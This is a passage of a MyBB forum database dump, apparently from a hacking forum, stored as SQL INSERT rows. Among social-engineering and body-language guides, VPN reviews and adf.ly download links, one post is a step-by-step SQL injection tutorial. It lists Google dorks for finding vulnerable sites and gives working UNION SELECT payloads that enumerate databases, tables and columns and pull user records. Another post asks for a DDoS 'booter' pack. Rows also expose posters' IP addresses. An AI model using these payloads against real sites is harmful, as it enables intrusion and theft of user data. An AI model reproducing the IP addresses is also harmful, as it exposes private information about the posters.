teacher then that\'s probably true or the bathroom excuse never expires. [b]Optional:[u] Step 8[/u][/b] If you are a good student and you are failing then you can ask them for more work to boost up your grades and since they care about you and know you they won\'t dump work on you. They will give you less work and in most of the stuff say you don\'t know/understand so they will answer it for you which will save you time and you won\'t need to answer them. When they are talking to you look in their eyes or say mhm, ok or yeah. Good Luck! [color=transparent]Some keywords to help bring traffic to LH Social Engineering, SE, Teachers ,L33t ,Hacking ,Hack forums ,SQLI ,Human Manipulation ,Cheat [/color]', '41.174.14.8', '699272712', '0', '0', '4', '1340515833', '1', '110e840fa614141ccfec82729b3ab224', '0', '1340515833'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('55', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '4', 'Triple H', '1340516596', 'Can you please stop using bold and x-large text? BTW what are dubstep remixes?', '41.174.14.8', '699272712', '0', '0', '0', '0', '1', 'c8af584454c71fa3b5ad5c1ab2b1b68f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('56', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '4', 'Triple H', '1340516694', 'Can I have this? BTW I can\'t PM till I have 10 posts.', '41.174.14.8', '699272712', '0', '0', '0', '0', '1', 'ff87c233c8d55d5e00f6b1898f4d6c1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('57', '20', '0', '13', 'SQL Injection Tutorial (Step-by-Step)', '0', '5', 'Timmy', '1340517446', '[color=#FF0000]SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.[/color] Step-by-Step tutorial for SQL Injection [b]Step 1:[/b][color=#1E90FF] Find a website that is vulnerable to the attack. This is the first step in SQLi and like every other hack attack is the most time consuming, and is the only time consuming step. Once you get through this, rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks(google strings to find vulnerable sites). Though at the end of this post, we\'ll provide a list of vulnerable sites.[/color] [spoiler]Dorks: \"inurl:index.php?catid=\" \"inurl:news.php?catid=\" \"inurl:index.php?id=\" \"inurl:news.php?id=\" inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= and you can also write your own. [/spoiler] How to check if a webpage is vulnerable to this attack??? Once you execute the dorks and get the preferred search results. Say for example hxxp://www.example.com/index.php?catid=1 Add a \' (apos) at the end of the URL. Such that the URL looks like hxxp://www.example.com/index.php?catid=1\' If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result. Typical errors you\'ll get after appending the apostrophe are: [color=#FFD700]Warning: mysql_fetch_array(): Warning: mysql_fetch_assoc(): Warning: mysql_numrows(): Warning: mysql_num_rows(): Warning: mysql_result(): Warning: mysql_preg_match():[/color] [b]Step 2:[/b][color=#32CD32]Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you. Append an \'order by\' statement to the URL. eg. hxxp://www.example.com/index.php?catid=1 order by 1 Continue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries. Append an \'Union Select\' statement to the URL. Also precede the number after \"id=\" with a hyphen or minus. Say from the above step, you got that the table has 6 columns. eg. hxxp://www.example.com/index.php?catid=-1 union select 1,2,3,4,5,6 Result of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we\'ll inject our SQL statements in one of these columns. [/color] [b]Step 3:[/b] [color=#DCDCDC]Enumerating the SQL version We\'ll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2. eg. hxxp://www.example.com/index.php?catid=-1 union select 1,@@version,3,4,5,6 You\'ll get the version of the database in the place where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site.[/color] [b]Step 4:[/b] [color=#9400D3] Exploit To get list of databases: hxxp://www.example.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata-- Result will display a list of databases on the site. Here on, we\'ll write the results we have got from our test. Result: information_schema,vrk_mlm To know the current database in use: hxxp://www.example.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6-- Result: vrk_mlm To get the current user: hxxp://www.example.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6-- Result: vrk_4mlm@localhost To get the tables: hxxp://www.example.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Result: administrator,category,product,users We\'ll concentrate our attack on the users table. To get the columns: hxxp://www.example.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc, prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id, refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position, email_id,password,edited_on,last_login,created_on,chain_number,phone,address By lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that.[/color] Extract information: [color=#FF1493]union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0 x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users-[/color] Enjoy! Thanks for reading.', '41.174.14.8', '699272712', '1', '0', '0', '0', '1', '7328c4d8d0df75209c5e31147f7e0b08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('58', '20', '57', '13', 'RE: SQL Injection Tutorial (Step-by-Step)', '0', '2', 'Apathy', '1340567959', 'Thanks for contributing to the site. Nice tutorial', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', 'e26fa4d26be1de51940371cf973a85c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('59', '21', '0', '16', '[GUIDE] In-depth reading of body language.', '0', '2', 'Apathy', '1340568256', '[u][color=#4682B4][size=medium][b]Intro[/b][/size][/color][/u] [i]As most of you may know, body language is a type of non-verbal communication. This form of communication consists of body posture, facial expressions, eye movements and gestures. Humans send, receive and interpret these signals entirely subconsciously. So if you think about it.., if we would observe every person in our direct environment, we\'d be able to get direct access to their state of mind. Further more, if we would exploit this information, we could easily put people at ease during a conversation.[/i] [color=#4682B4][size=medium][u][b]Emotions[/b][/u][/size][/color] [i]In our daily lives, we experience many different kinds of emotions. By looking around you once in a while, you will realize and perhaps, experience that there are many more kinds of emotions that you probably don\'t even know, yet. Therefore, it is important as a social engineer to sit on the side lines and observe. Below this sentence, you\'ll find a list of all [color=#32CD32][b]positive[/b][/color] human emotions. I want you to post a comment if there\'s an emotion that you haven\'t heard of, yet.[/i] [list] [*][b]Comfortable[/b] [*][b]Dedicated[/b] [*][b]Enthousiastic[/b] [*][b]Glorious[/b] [*][b]Hopeful[/b] [*][b]Joyful[/b] [*][b]Pleasure[/b] [*][b]Cheerful[/b] [*][b]Relaxed[/b] [*][b]Pride[/b] [*][b]Excited[/b] [*][b]Delighted[/b] [*][b]Lively[/b] [*][b]Surprised[/b] [*][b]Satisfied[/b] [*][b]Energetic[/b] [*][b]Charmed[/b] [/list] [i]Below this sentence, you\'ll find a list of all [color=#FF0000][b]negative[/b][/color] human emotions. I want you to post a comment if there\'s an emotion that you haven\'t heard of, yet.[/i] [list] [*][b]Annoyed[/b] [*][b]Anxious[/b] [*][b]Angered[/b] [*][b]Bored[/b] [*][b]Cautious[/b] [*][b]Competitive[/b] [*][b]Concerned[/b] [*][b]Confused[/b] [*][b]Depressed[/b] [*][b]Disgusted[/b] [*][b]Distracted[/b] [*][b]Doubtful[/b] [*][b]Disappointed[/b] [*][b]Exhausted[/b] [*][b]Embarassed[/b] [*][b]Frustrated[/b] [*][b]Fear[/b] [*][b]Guilty[/b] [*][b]Impatient[/b] [*][b]Indifferent[/b] [*][b]Jumpy[/b] [*][b]Lonely[/b] [*][b]Mad[/b] [*][b]Panic[/b] [*][b]Revenge[/b] [*][b]Shame[/b] [*][b]Sad[/b] [*][b]Scared[/b] [*][b]Shocked[/b] [*][b]Suspicious[/b] [*][b]Stressed[/b] [*][b]Tired[/b] [*][b]Uncomfortable[/b] [/list] [i]Also notice that sometimes, negative emotions might not nearly be as intense as you think. It all depends on how WE label the emotion in our heads. Some people might rather be irritated than angry, or either frustrated than disappointed. So, as you can see, there are many different types of emotions in our daily lives. It may be a good thing if you\'d look around you once in a while, then come back to this list and see how much you\'ve experienced.[/i] [color=#4682B4][size=medium][u][b]Physical expressions[/b][/u][/size][/color] [i]Many physical expressions, such as waving, pointing or touching are all forms of nonverbal communication. People always move their bodies while communicating because it helps, as research has shown; [/i] [quote]\"ease the mental effort when communication is difficult.\"[/quote] [i]As I said earlier, physical expressions explain a lot about the person who is using them. For example, gestures could easily emphasize a point or relay a message, while a posture could show signs of boredom or great interest. Here are some of the most frequent gestures and postures in our daily lives;[/i] [list] [*][b]Arms crossed over the chest.[/b][list] [*][i]This is without a doubt one of the most basic, yet powerful body language signals in human history. When someone does this, it could indicate that this person is putting up a subconscious barrier between themselves and what we would call \'reality\'. This usually means that they want to be left alone for a while. If this gesture is used in an amical situation, it might mean that the person is thinking deeply about what is being discussed. Yet, if the situation is rather serious, sudden or confrontational, this might mean that this person is expressing an opposition. This is especially so when said person is leaning away from us, the speakers.[/i] [/list] [/list] [list] [*][b]Constant eye contact.[/b][list] [*][i]In most cases, constant eye contact means that a person is thinking positively about us, the speaker. However, it could also mean that the other person doesn\'t trust us enough to \"take their eyes off us.\". Lack of eye contact might indicate negativity as well. Don\'t let this information fool you, though. People with an anxiety disorder may not be able to look at another without getting a feeling of discomfort. Therefore, eye contact is pretty much a secondary and misleading gesture. When combined with the \"crossed-arms\" signal, the eye contact gesture usually means that something is playing in that person\'s mind and that he wants to talk about it.[/i] [/list] [/list] [list] [*][b]Scratching behind the ear.[/b][list] [*][i]Most of the time, this will go together by scratching their chin or averting their gaze. These signals indicate disbelief. When someone is not convinced with what we\'re saying, their attention will wander and their eyes will stare away for an extended period.[/i] [/list] [/list] [list] [*][b]Tilting the head.[/b][list] [*][i]Tilting the head might indicate boredom, which mostly goes paired with an unfocussed gaze as well. However, a tilted head might also be the cause of a sore neck and the unfocussed eyes could easily mean that the listener has some sort of ocular problem.[/i] [/list] [/list] [list] [*][b]Excessive blinking.[/b][list] [*][i]This is a well known indicator of someone who is either withholding information or lying. Studies do show us that the absence of blinking might as well indicate someone who is lying, rather than excessive blinking.[/i] [/list] [/list] [color=#4682B4][size=medium][u][b]Body signal clusters[/b][/u][/size][/color] [i]As you may have realized by now, body language comes in clusters of signals and postures, depending on the internal emotions and mental states of a person. Recognizing a whole cluster would thus far be more reliable than trying to recognize every individual element. I\'ll give you guys a good head start to recognize these clusters.[/i] [u][b]Aggressive body language:[/b][/u] [i]A significant cluster of body movements is used to signal agression. Recognizing this one is quite useful as it is seldom a good idea to get into a fight, even for the stronger people among us.[/i] [list] [*][b]Facial signals[/b][list] [*][i]A lot of agressions is always shown in the face, from disapproving frowns and pursed lips to a full snarl. The eyes might eventually stare and hold your gaze for a long period, or they\'ll squint, preventing theirselves from seeing where we are looking.[/i] [/list] [/list] [list] [*][b]Attack signals[/b][list] [*][i]When somebody is about to attack, they mostly give some visual signs such as clenching their fists or lowering their body for an increase of speed and stability.[/i] [/list] [/list] [list] [*][b]Exposing theirselves[/b][list] [*][i]Exposing oneself to attack is also one of the purest forms of agression. They are pretty much implying that they could take a hit from you any time and still win this fight. This can include things such as looking away from you, crotch displays, turning their backs, relaxing the body, and so on..[/i] [/list] [/list] [u][b]Bored body language:[/b][/u] [i]When a person is bored, their entire body is telling you that. So, if you are trying to persuade said person, don\'t even bother.[/i] [list] [*][b]Distraction[/b][list] [*][i]An obviously bored person pretty much looks everywhere but at the person talking to them. A gaze shifting towards a clock or their watch is also an obvious sign of boredom.[/i] [/list] [/list] [list] [*][b]Repetition[/b][list] [*][i]Bored people usually repeat certain actions such as tapping their shoes or drumming their fingers. When these actions escalate, they are usually trying to signal their boredom.[/i] [/list] [/list] [list] [*][b]Tiredness[/b][list] [*][i]A person who feels unable to relieve their boredom may show signs of tiredness. They would yawn and their whole body would sag as they slouch down in their seat, lean against a wall or just sag where they are standing. Their face might also display a lack of interest and appear blank.[/i] [/list] [/list] [u][b]Deceptive body language:[/b][/u] [i]When a person is trying to deceive you, there are many different signs of body language they may use.[/i] [list] [*][b]Anxiety[/b][list] [*][i]A deceptive person is typically anxious that they might be found out (unless they are psychopatic or very good at acting), so they may send signs of tension. This may include sweating, sudden movements, minor twitches of muscles (especially around the mouth and eyes), changes in voice tone and speed.. Many of us do have hidden anxiety signals. These could be biting your bottom lip, patting your head or even putting your hands in your pockets. These signals are impossible to stop, since we start them very young. Do keep in mind that anxiety can be caused by many other factors other than deceptiveness.[/i] [/list] [/list] [list] [*][b]Over-control[/b][list] [*][i]In order to avoid being caught, there may be obvious signs over what we\'d call over-control. For example, attempt friendly body language, such as smiles (mouth smiles but eyes do not.), jerky movements and or clumsiness. The person might also try to keep his body still as if he doesn\'t want it to send these signals. This in itself is also an obvious signal, ofcourse.[/i] [/list] [/list] [list] [*][b]Distracted[/b][list] [*][i]A person who is trying to deceive needs to think more about what he or she is saying, so they may drift off or pause during their speech. Anxiety is mostly displayed into actions such as fidgeting or shifting their vision to an unusual places.[/i] [/list] [/list] [u][b]Evaluating body language:[/b][/u] [i]A notable cluster of body language signals occurs when someone is judging or making a decision.[/i] [list] [*][b]Hand movements[/b][list] [*][i]The classical signal of evaluation is steepled hands which are clasped together, either looking like their praying with their hands together, or with linked fingers and with only the index fingers pointing upwards. The fingers pointing upwards may also touch the lips, stroke the chin or touch another place on the face.[/i] [/list] [/list] [list] [*][b]Relaxed intensity[/b][list] [*][i]The body may well be relaxed and open, seeming to be unafraid or unaware of danger. However there is also a level of concentration, perhaps with pursed lips and an intense gaze. The chin might be resting on either of the two palms.[/i] [/list] [/list] [u][b]Open body language:[/b][/u] [i]A significant cluster of body movements are all about being open. This is sometimes misinterpreted solely as indicating being relaxed and untense.[/i] [list] [*][b]Arms wide open[/b][list] [*][i]A person\'s arms usually shouldn\'t be crossed when exposing theirselves. Their arm movements might even be synchronized with what is being said or held wide. Palms are also relaxed and usually quite expressive, for example appearing to hold something or form more detailed shapes.[/i] [/list] [/list] [list] [*][b]Removing clothes[/b][list] [*][i]Removing a jacket or unbuttoning a collar are also obvious signs of open body language.[/i] [/list] [color=#4682B4][size=medium][u][b]Individual facial signs[/b][/u][/size][/color] [img]http://i.imgur.com/8HgeG.png[/img] [color=#4682B4][size=medium][u][b]Using body language for sales[/b][/u][/size][/color] [i]Getting body language right when s3lling is a tricky business. Here are some tips to help manage your non-verbals.[/i] [list] [*][b]Open assertion[/b][list] [*][i]Stand openly, welcoming everyone, inquiring of their needs and showing readiness to listen. Your body language should be clear and relaxed, without being held in or under control. It supports speech, for example in emphasizing key points, and never contradicts it. It does not include unnecessary movement which may cause confusion or betray nervousness.[/i] [/list] [/list] [list] [*][b]Match and move[/b][list] [*][i]It would be good if you could largely start off by reflecting them back, for example by matching body language and using a similar verbal style, in order to create some sort of emotional/mental bond with them. Keep your body at the same level as theirs. Stand up to greet them and sit down at the same time without hesitating. Once they have been bonded with you, you should be able to speak or move differently since they will now be following you.[/i] [/list] [/list] [list] [*][b]Leaning in[/b][list] [*][i]When you lean in towards the customer, you are getting closer to them. Thus, you are creating an even closer bond between the two of you. However, there is a danger that the other person might take this as an invasion on their personal body space, so taking your time is a must. Leaning in can be conspiratorial when the sales person lowers their voice, as if making this exclusive offer in a way that cannot be heard by their boss or other customers (who would of course snap it up immediately). Leaning also lowers the body and is a subtle bow, showing respect and deference, hence taking the sting out of any perception of dominance.[/i] [/list] [/list] [/list] credits:Oldskool', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', '1c41f042179df904fec644f85c326928', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('60', '20', '57', '13', 'RE: SQL Injection Tutorial (Step-by-Step)', '0', '1', 't3h jok3r', '1340593391', 'Well-written tutorial. Nice job and thanks for posting. The red colored text is hard to read.', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '8d312e813995a4d78d745fba5fdefa39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('61', '21', '59', '16', 'RE: [GUIDE] In-depth reading of body language.', '0', '1', 't3h jok3r', '1340594129', 'Wow great tutorial. I learned a lot today. Thanks for this bro and I didn\'t get the relief in the picture.', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '0e3c0030aba629e0b81be9e1918253d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('62', '22', '0', '14', 'Cyberghost VPN (Free/Premium)', '0', '1', 't3h jok3r', '1340594542', '[b]What is Cyberghost VPN?[/b] CyberGhost VPN is a personal VPN client and online service that lets users browse the Internet anonymously by acting as a firewall and server between your PC and your ISP. It lets you surf the Web normally while hiding your IP address and displaying a dead-end address. It\'s available in free and premium versions; the free version can only be installed on one PC and only one account can be activated on each computer, whereas the premium account offers more options and features. [b]Why use Cyberghost VPN?[/b] CyberGhost installs and sets up easily, including creating a username and password, though we had to reboot our system to finish the process. The program\'s main screen resembles many antivirus and firewall programs, with a left-hand list of the program\'s functions, a toolbar, and bar graphs indicating both free and premium traffic while logged on to the VPN. A prominent message warned us that we were not anonymous online and also displayed our current IP address. We clicked Connect to VPN, and a pop-up gave us several options: Connect to Free service, Create Premium connection, and Create Premium Connection with a specified server on a drop-down list. We could also display a list of available Premium servers. We tried both the Free and Premium services, which are similar. We quickly logged on to the CyberGhost VPN service and reopened our browser, which functioned normally, with the exception that our Google search page was now Google.de instead of Google.com, a small matter we quickly rectified. Every site we visited loaded normally. [b]Personal Opinion[/b] Good plus auto connects to different servers everytime you connect. Premium version keeps no logs and you can pick any location you want. Link: http://download.cnet.com/CyberGhost-VPN/3000-2144_4-75145993.html', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', 'e99ab7cfaf432073940a0e9398c265f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('63', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '5', 'Timmy', '1340594873', 'I use this VPN. It\'s a really great VPN plus I like the random servers thingy.', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '12309368b8d1492565773e2c9cd35ad2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('64', '3', '7', '19', 'RE: Official Site Rules', '0', '5', 'Timmy', '1340595160', 'Thanks for the rules but why such a big font?', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '2603c6c3790c8190ef4b2823b87dd749', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('65', '15', '41', '9', 'RE: Adf.ly>Earn $$$ by clicks on links', '0', '5', 'Timmy', '1340595244', 'Thanks, I will be using your referral :D', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '07bb53bcb1f16df201d5cc88fb63f9f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('66', '23', '0', '11', 'Can someone tell me what\'s the difference between a proxy and VPN?', '0', '5', 'Timmy', '1340595366', 'Can someone tell me the difference between both?', '41.174.59.138', '699284362', '1', '0', '0', '0', '1', '94cfe6ad60d77d6e31d06bbbddf86029', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('67', '23', '66', '11', 'RE: Can someone tell me what\'s the difference between a proxy and VPN?', '0', '1', 't3h jok3r', '1340736329', 'A proxy is a online based anonymous IP changer to keep you anonymous. A VPN is pretty much the same but they have to be downloaded or setup and the best in my opinion because all proxies are lame and keep logs and not all VPNs keep logs.', '41.174.2.53', '699269685', '1', '0', '0', '0', '1', '21206bbea2547a5b3a7fbfe0d9ec7ae2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('68', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '2', 'Apathy', '1340764664', 'Nice review keep it up bro.', '173.206.139.81', '-1378972847', '0', '0', '0', '0', '1', '4d960d0bd9e87f43c80560e50123199b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('69', '24', '0', '12', '240 Monetizing and hacking ebooks.', '0', '2', 'Apathy', '1340764927', 'To download JUST CLICK THE IMAGE. [url=http://adfoc.us/447466576320][img]http://upload.wikimedia.org/wikipedia/commons/2/24/Adobe_PDF_Icon.svg[/img][/url]', '173.206.139.81', '-1378972847', '0', '0', '0', '0', '1', '5f5b76859f11443b63ae6a3012122522', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('70', '24', '69', '12', 'RE: 240 Monetizing and hacking ebooks.', '0', '1', 't3h jok3r', '1340832554', 'What kinds of hacking ebooks? Plus what kinds of monetizing methods does this contain?', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', '768c51d6281a693f5277f3192ffe2321', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('71', '25', '0', '19', '[Junk]Blackhat System Scanner', '0', '5', 'Timmy', '1340833180', '[align=center][img]http://i.min.us/iCXKZHlD0g8Op.png[/img][/align] This programs purpose is to serve a portable and simple scantime virus scanner. It will scan your system for potential and actual viruses on your system. Features: [x] Scans whole system [x] Active Anti-Virus [x] Quarantine [x] Lists CPU Info [x] Restore Regedit, CMD, Run, Folder Options, UAC, Hosts File, System Restore, Task Manager. [x] Lists other Programs [x] Ignore All [x] Ignore just checked detections [x] Remove all detections [x] Remove just checked detections [x] Simple [x] Portable / Small [x] Quick (Scans are under 1 minute) Download: http://adf.ly/A86yh', '41.174.23.131', '699275139', '1', '0', '5', '1340833203', '1', '2cdce4d2affa144f724443748af66021', '0', '1340833203'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('72', '23', '66', '11', 'RE: Can someone tell me what\'s the difference between a proxy and VPN?', '0', '5', 'Timmy', '1340833246', 'Ok. Thanks what are some good VPNs out there?', '41.174.23.131', '699275139', '1', '0', '0', '0', '1', 'f87c69626393c0bc4e2e9f1c9c2f0315', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, 